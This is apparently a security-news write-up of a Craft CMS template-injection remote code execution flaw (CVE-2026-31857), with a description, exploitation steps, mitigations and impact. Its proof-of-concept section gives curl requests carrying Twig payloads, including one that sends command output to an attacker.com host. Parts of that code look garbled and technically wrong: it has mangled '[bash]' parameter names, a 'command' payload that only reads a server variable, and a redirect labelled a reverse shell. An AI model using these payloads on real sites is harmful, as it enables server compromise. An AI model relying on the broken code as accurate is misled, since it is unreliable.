Listen to this Post
The vulnerability exists in the Craft CMS conditions system, specifically within the `BaseElementSelectConditionRule::getElementIds()` method. This method passes user-controlled string input through renderObjectTemplate(), which is an unsandboxed Twig rendering function with escaping disabled. Attackers can inject malicious Twig code into relational condition rules because the input is not sanitized before being passed to the template engine. When the Twig code is rendered, it executes on the server, allowing arbitrary PHP code execution. The exploit is delivered via standard element listing endpoints that any authenticated Control Panel user can access. The vulnerability requires no admin privileges, no special permissions beyond basic control panel access, and bypasses all production hardening settings including allowAdminChanges: false, devMode: false, and enableTwigSandbox: true. This means even locked-down production sites with security features enabled remain vulnerable. The unsafe rendering occurs because the condition system trusts user input when building element queries, treating it as template code rather than plain data. Successful exploitation results in full server compromise with the permissions of the web server user .
Platform: CraftCMS
Version: 4.17.3, 5.9.8
Vulnerability: RCE via Conditions
Severity: High
Date: March 11, 2026
Prediction: Patch already released
What Undercode Say:
Analysis
The CVE-2026-31857 vulnerability represents a critical failure in input handling within CraftCMS. Unlike previous RCE vulnerabilities that required admin privileges or specific configurations, this flaw affects all authenticated users regardless of role. The conditions system, designed to allow dynamic element filtering, inadvertently became a code execution vector when user input passed through `renderObjectTemplate()` without sandboxing. This function is intended for rendering object templates safely, but the missing sandbox and disabled escaping created a direct Server-Side Template Injection (SSTI) path. The vulnerability bypasses all hardening settings because the condition processing occurs before those security controls are applied.
Proof of Concept Code
CraftCMS CVE-2026-31857 Exploit PoC
Authenticated RCE via relational conditionals
Step 1: Authenticate to CraftCMS Control Panel
Save session cookies for authenticated requests
Step 2: Craft malicious condition rule
The payload injects Twig code that executes system commands
TARGET="https://target-craftcms.com"
SESSION_COOKIE="CraftSessionToken=your_authenticated_session"
Payload that executes 'id' command via Twig
PAYLOAD='{{ craft.app.request.serverVariable("id")|raw }}'
Send exploit via element listing endpoint
curl -X POST "$TARGET/index.php?p=admin/element-index" \
-H "Cookie: $SESSION_COOKIE" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "criteria[bash]=$PAYLOAD&elementType=craft\elements\Entry"
Alternative payload for reverse shell
Encode payload to avoid request filtering
REVERSE_SHELL='{{ craft.app.response.redirect("http://attacker.com:8080/?cmd=" ~ craft.app.request.serverVariable("whoami")) }}'
ENCODED=$(echo -n "$REVERSE_SHELL" | jq -sRr @uri)
curl -X POST "$TARGET/index.php?p=admin/element-index" \
-H "Cookie: $SESSION_COOKIE" \
-d "criteria[bash]=$ENCODED&elementType=craft\elements\Asset"
Detection command - Check if vulnerable version running Vulnerable: 4.0.0-beta.1 through 4.17.3, 5.0.0-RC1 through 5.9.8 curl -s "$TARGET/index.php?p=admin" | grep -E "Craft CMS [bash].[0-9]+.[0-9]+" Check installed version via composer if accessible composer show craftcms/cms | grep versions
Exploit
The exploitation process requires only authenticated access to the CraftCMS Control Panel. An attacker logs in with any account that has basic access—Author, Editor, or any role with Control Panel permissions. They then navigate to any element listing page (Entries, Assets, Categories, etc.) that supports conditional filtering. Using browser developer tools, they intercept the request sent when applying filters. The vulnerable parameter is the condition rule within the criteria JSON. The attacker replaces legitimate condition values with Twig code designed to execute system commands. When the server processes BaseElementSelectConditionRule::getElementIds(), it calls `renderObjectTemplate()` on the attacker-controlled string. The Twig engine executes the code, which can include function calls to craft.app.request.serverVariable(), craft.app.response.redirect(), or direct PHP execution via system(), passthru(), or shell_exec(). The result is returned in the element listing response or visible through out-of-band channels like reverse shells or HTTP callbacks. The vulnerability does not require any special privileges because the condition system is accessible to all authenticated users by default.
Protection from this CVE
Immediate patching is the only complete mitigation. Upgrade to CraftCMS 4.17.4 or 5.9.9 immediately . For temporary protection until patching is possible, disable the conditions functionality for non-admin users by modifying user permissions in the Control Panel. Remove “Access Control Panel” permissions from all non-essential accounts, though this may impact business operations. Implement Web Application Firewall (WAF) rules to block requests containing Twig syntax ({{.}} or {%.%}) in element listing endpoints. Monitor logs for unusual element listing requests containing template syntax. Apply input validation at the proxy level to reject condition parameters containing curly braces. Consider implementing network segmentation to limit outbound connections from the web server, preventing reverse shell callbacks if exploitation occurs. Review all authenticated user accounts and disable any that do not require Control Panel access. Enable detailed logging for element listing endpoints to aid in post-incident investigation.
Impact
Successful exploitation grants attackers full Remote Code Execution on the underlying server with the privileges of the web server user. This typically allows reading sensitive configuration files containing database credentials, encryption keys, and application secrets. Attackers can exfiltrate all content managed by the CMS, including unpublished drafts and restricted entries. They can modify or delete existing content, insert malicious code into pages viewed by visitors, and use the compromised server as a pivot point for internal network attacks. The vulnerability affects all versions from 4.0.0-beta.1 through 4.17.3 and 5.0.0-RC1 through 5.9.8 . Any authenticated Control Panel user—regardless of role—can trigger the exploit. The attack bypasses all production hardening settings, meaning even sites configured with maximum security controls remain vulnerable. The CVSS 4.0 base score of 8.1 (HIGH) reflects the network attack vector, low complexity, no required privileges beyond authentication, and high confidentiality, integrity, and availability impacts . Organizations using affected versions should treat this as an emergency patching priority.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

